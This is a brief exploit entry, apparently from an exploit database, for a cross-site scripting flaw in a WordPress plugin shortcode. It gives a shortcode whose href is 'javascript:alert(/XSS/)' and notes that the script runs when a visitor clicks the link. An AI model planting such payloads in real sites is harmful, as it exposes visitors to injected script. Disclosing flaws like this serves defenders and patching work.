Share
## https://sploitus.com/exploit?id=WPEX-ID:B6AC3E15-6F39-4514-A50D-CCA7B9457736
[spu-facebook-page href="javascript:alert(/XSS/)" name="ClickMe!"]

The XSS will be triggered when a user click on the ClickMe! link in the page where the shortcode is embed